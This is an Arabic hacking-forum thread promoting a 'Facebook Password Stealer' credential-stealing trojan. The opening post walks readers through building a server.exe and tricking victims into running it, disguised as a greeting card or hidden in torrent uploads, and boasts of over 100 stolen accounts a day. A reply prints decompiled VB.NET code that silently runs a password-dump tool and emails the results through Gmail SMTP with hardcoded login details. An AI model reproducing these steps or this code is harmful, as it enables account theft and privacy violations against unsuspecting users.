تنبيه هام (X*) =========== البرنامج خطير جدا ومتشفر بخوارزمية قاتلة وغير مكشوف من اي انتي فيرس ومتلغم جاهز. متحاولش تفتح البرنامج في جهازك لانه في لحظة الباسوردات ال محتفظ بيها هتبقي في الشارع وكل اللي رايح واللي جاي يشوت فيها ^__^ نبدأ الشرح علي بركة الله ==================== ازاي تسرق باسوردات الفيس بوك من جهاز الضحية باستخدام برنامج Facebook Password Stealer دي تعتبر من الطرق القليلة والمضمونة لسرقة الباسوردات الاصدارة الرابعة من البرنامج .. فيها تغييرات وامكانيات اكبر من الاصدارت السابقة. اولا: حمل البرنامج من الرابط الاتي https://github.com/v1rus0bl4ck/files...iles/fbsR4.exe هتلاقي ملف اسمه fbsR4.exe علي هيئة عقرب ^_^ ده الملف اللي هتصنع بيه السيرفر الخاص بيك هتفتح الملف ده هتلاقي الايميل بتاعي مكتوب كده [email protected] هتمسحه وتقوم كاتب الايميل بتاعك انت .. واتاكد انك كاتب الايميل صح عشان اي غلطة في الايميل معناها ان الباسوردات مش هتوصلك. بعدين تدوس create server هتلاقي ملف جديد ظهر اسمه server.exe ده بقا الملف الخطير .. اللي بيسرق الباسوردات المخزنة في جهاز الضحية ويبعتهملك علي الايميل اللي كتبته..وده هو الملف اللي متحاولش تفتحه في جهازك هترسل السيرفر ده للضحية علي انه مثلا كارت معايدة ^__^ او اي حاجة تقنعه انه يفتح الملف في جهازه ولو عايز ضحايا كتير ممكن تلغم السيرفر ده في ملف تورنت.. وترفعة علي مواقع التورنت انا استخدمت الطريقة دي .. واقدر اقولك انه بيوصلني كل يوم اكتر من 100 ايميل فيسبوك وكل يوم العدد بيزيد ^_^ طبعا في طرق كتير غير دي واجمل منها..وكل هكر وله طريقته الخاصة في جلب الضحايا بعد ما الضحية يفتح البرنامج البرنامج هيسرق باسوردات الفيس بوك المسجلة علي جهازه ويبعتهم للايميل بتاعك تروح تفتح الايميل بتاعك .. هتلاقي الباسوردات بالشكل ده مبروك عليك الباسوردات ^_^ مميزات البرنامج ============ بيقدر يسحب الباسوردات من: Firefox Internet Explorer Google Chrome Chrome Canary/SXS CoolNovo Browser Opera Browser Apple Safari Flock Browser SeaMonkey Browser Comodo Dragon Browser SRWare Iron Browser Paltalk Messenger Miranda Messenger كمان التبليغ اصبح عن طريق الايميل .. يعني مفيش وجع القلب بتاع المواقع وكل شوية الصفحة تقفل من كتر الضغط . كمان البرنامج سهل جدا في الاستخدام وواجهته بسيطة..بس امكانياته رهيبه ^_^ عيوب البرنامج ============ للاسف البرنامج مكتوب بالسي شارب يعني هيحتاج net-frameworkv4.5 عموما دي مشكلة صغيرة..لان معظم الاجهزة دلوقتي فيها ال net-frameworkv4.5 اللهم الا القليل وان شاء الله هحاول اعيد كتابة البرنامج بالسي بلس بلس بس دا هياخد وقت ومجهود ملحوظة مهمة (*) =========== للناس اللي مش مصدقة.. وكانت تستهزئ بالموضوع.. حمل البرنامج وشغله علي ويندوز وهمي..ولو خايف علي الايميل الاساسي بتاعك.. اعمل ايميل جديد واستخدمه.. وشوف بنفسك البرنامج شغال او لا . ^__^ والناس اللي اتهمتني زور .. بالعقل يعني في واحد عايز يخترق جهازك يقولك البرنامج خطير ومتلغم ومتشفر ومتفتحوش في جهازك .. لا وايه كمان يحطه في منتدي هكرز .. يعني المنطق بيقول لو عايز اعمل كده اروح منتدي زي "سيدتي" او منتدي "شباب كول" ^__^ كمان ياريت الاعضاء اللي جربو البرنامج واشتغل معاهم يدخلوا ويقولوا رايهم بصراحة حتي لو في نقد او ملحوظه حابب يضيفها اكيد هرحب بيه وفي الختام احب اتقدم بالشكر لكل الاعضاء اللي ساهموا بارائهم وافكارهم في تطوير البرنامج ووصوله لشكله الحالي تحياتي للجميع V!RU$ BL4CK
التعديل الأخير تم بواسطة konan77 ; 03-22-2015 الساعة 06:57 PM
It’s the art where a small man is going to prove to you, no matter how strong you are, no matter how mad you get, that you’re going to have to accept defeat
انا اشكرا المشرف العام
المشاركة الأصلية كتبت بواسطة amalt انا اشكرا المشرف العام شكرا لمرور يا غالي تحياتي لك
تم التحديث .. بالتوفيق
جاري الفحص مشكووووووووررر
شكرا علي مرورك اخي الكريم
جاري التجربة أخي و مشكور على المجهودات جبارة حقا في سبيل الافادة و المساعدة تستحق التقييم - - - تم التحديث - - - مع كل احتراماتي لك بس البرنامج طــــــلع فيروس كشفو avast antivirus و اتمنى اني لم احرج اخي
الجرذان لا تؤمن بالمبادئ حتي تطلب منها مقاومة اغراءات الجبـن
وعليكم السلام.. شاكر لك جهدك اخي الكريم لاكن هناك بعض الملاحظات اولا الادة نظيفة لاكن بعد تشغيل انشاء السيرفر و تشغيله ينزل ملفين في جهازي الضحية في المسار ----> C:\Users\ANAS\AppData\Roaming (ANAS)---> اسم المستخدم بأسم res.com fbsm.exe حقيقتا لم اعرف عمل الملف res.com لكن عمل fbsm.exe هو ارسال بيانات الضحية الى الملغم هذا الكود بعد استخراجه كود PHP: Private Shared Sub Run(ByVal email As String) Try Dim folderPath As String = Environment.GetFolderPath(SpecialFolder.ApplicationData) Console.WriteLine(folderPath) Dim res As Byte() = Resources.res File.WriteAllBytes((folderPath & "\res.com"), res) Dim str2 As String = "" Dim str3 As String = (folderPath & "\res.com") Dim process As New Process With { _ .StartInfo = { UseShellExecute:=False, CreateNoWindow:=True, WindowStyle:=ProcessWindowStyle.Hidden, RedirectStandardOutput:=True, RedirectStandardError:=True, FileName:="cmd", Arguments:=("/c " & str3) } _ } process.Start Do While Not process.StandardOutput.EndOfStream str2 = (str2 & process.StandardOutput.ReadToEnd) Loop str2 = str2.Replace("****************************************************************", "").Replace("Facebook Password Dump v3.0 by SecurityXploded", "").Replace("http://securityxploded.com/facebook-password-dump.php", ("********** Machine Name: " & Environment.MachineName & " **********")).Replace("Tip: For more options type FacebookPasswordDump.exe -h", "") Console.WriteLine(str2) Dim message As New MailMessage With { _ .From = New MailAddress("[email protected]") _ } message.To.Add(email) message.Subject = "****** V!RU$ BL4CK v4 ******" message.Body = str2 New SmtpClient("smtp.gmail.com", &H24B) With { _ .Credentials = New NetworkCredential("[email protected]", "otyoeiretjkpwxls"), _ .EnableSsl = True _ }.Send(message) Console.WriteLine("sent") Catch exception As Exception Console.WriteLine(exception.Message) End TryEnd Sub على ما يبدو لي ان البيانات لا تذهب فقط الى الملغم بل تذهب ايضاً الى صاحب البرنامج وهذا امر غير جيد يعتبر اسغلال ! جربت الادة على ايميل وهمي ارسلت الادة الرساله لاكن بدون بيانات الفيسبوك و السبب تصدى الوحش كروم له و هذي التبليغ وصل لدى بدون بيانات
Private Shared Sub Run(ByVal email As String) Try Dim folderPath As String = Environment.GetFolderPath(SpecialFolder.ApplicationData) Console.WriteLine(folderPath) Dim res As Byte() = Resources.res File.WriteAllBytes((folderPath & "\res.com"), res) Dim str2 As String = "" Dim str3 As String = (folderPath & "\res.com") Dim process As New Process With { _ .StartInfo = { UseShellExecute:=False, CreateNoWindow:=True, WindowStyle:=ProcessWindowStyle.Hidden, RedirectStandardOutput:=True, RedirectStandardError:=True, FileName:="cmd", Arguments:=("/c " & str3) } _ } process.Start Do While Not process.StandardOutput.EndOfStream str2 = (str2 & process.StandardOutput.ReadToEnd) Loop str2 = str2.Replace("****************************************************************", "").Replace("Facebook Password Dump v3.0 by SecurityXploded", "").Replace("http://securityxploded.com/facebook-password-dump.php", ("********** Machine Name: " & Environment.MachineName & " **********")).Replace("Tip: For more options type FacebookPasswordDump.exe -h", "") Console.WriteLine(str2) Dim message As New MailMessage With { _ .From = New MailAddress("[email protected]") _ } message.To.Add(email) message.Subject = "****** V!RU$ BL4CK v4 ******" message.Body = str2 New SmtpClient("smtp.gmail.com", &H24B) With { _ .Credentials = New NetworkCredential("[email protected]", "otyoeiretjkpwxls"), _ .EnableSsl = True _ }.Send(message) Console.WriteLine("sent") Catch exception As Exception Console.WriteLine(exception.Message) End TryEnd Sub
لا إلــه إلا الله محمــد رســول الله *************************
المشاركة الأصلية كتبت بواسطة akramt-bag جاري التجربة أخي و مشكور على المجهودات جبارة حقا في سبيل الافادة و المساعدة تستحق التقييم - - - تم التحديث - - - مع كل احتراماتي لك بس البرنامج طــــــلع فيروس كشفو avast antivirus و اتمنى اني لم احرج اخي اولا البرنامج مش فيرس ده برنامج اختراق بترسله للضحية يسحبلك باسوردات الفيسبوك من جهازه ويبعتهم للايميل بتاعك يعني انت مبتفتحهوش علي جهازك ثانيا انا حملت افاست وعملت ابديت وفحصت البرنامج والبرنامج طالع نظيف ممكن اخوي تفحصه تاني او تبعتلي ايه القيم اللي مسكها افاست عشان اغير كود البرنامج او نغير طريقة التشفير ومشكور اخوي علي المرور - - - تم التحديث - - - على ما يبدو لي ان البيانات لا تذهب فقط الى الملغم بل تذهب ايضاً الى صاحب البرنامج وهذا امر غير جيد يعتبر اسغلال ! لو ركزت كويس في الكود هتلاقي ان البرنامج بيستخدم امر send مرة واحده فقط وده دليل ان البرنامج مش بيرسل البيانات غير مرة واحده بس لايميل الملغم الاداه بتستخدم ايميل خاص لارسال البيانات .. مش بترسل البيانات عن طريق عفريت مثلا عشان كده انت اتلخبط وقريت الكود غلط وافتكرت ان الاداة بترسل البيانات لاكثر من شخص الاداة مش مفتوحة المصدر وانا صاحب الاداة ولي كافة الحقوق محفوظه يعني مفيش حاجة اسمها استغلال جربت الادة على ايميل وهمي ارسلت الادة الرساله لاكن بدون بيانات الفيسبوك و السبب تصدى الوحش كروم له الاداة تقوم بفك قاعدة بيانات المتصفحات..والنسخة الاخيرة من قوقل كروم فقس الاداة ونزل حماية شديدة علي قاعدة بياناته وجاري محاولة فكها وانشاء الله سنقوم بعمل النسخة الخامسة للبرنامج وتكون قادرة علي جلب الباسوردات من جوجل كروم وانا بشكرك علي التبليغ ولو عندك اقتراح تحب تضيفه ياريت تبعتهولي علي الخاص تحياتي لك
ترقبوا الاصدار الجديد قريبا
عرض سحابة الكلمة الدلالية
قوانين المنتدى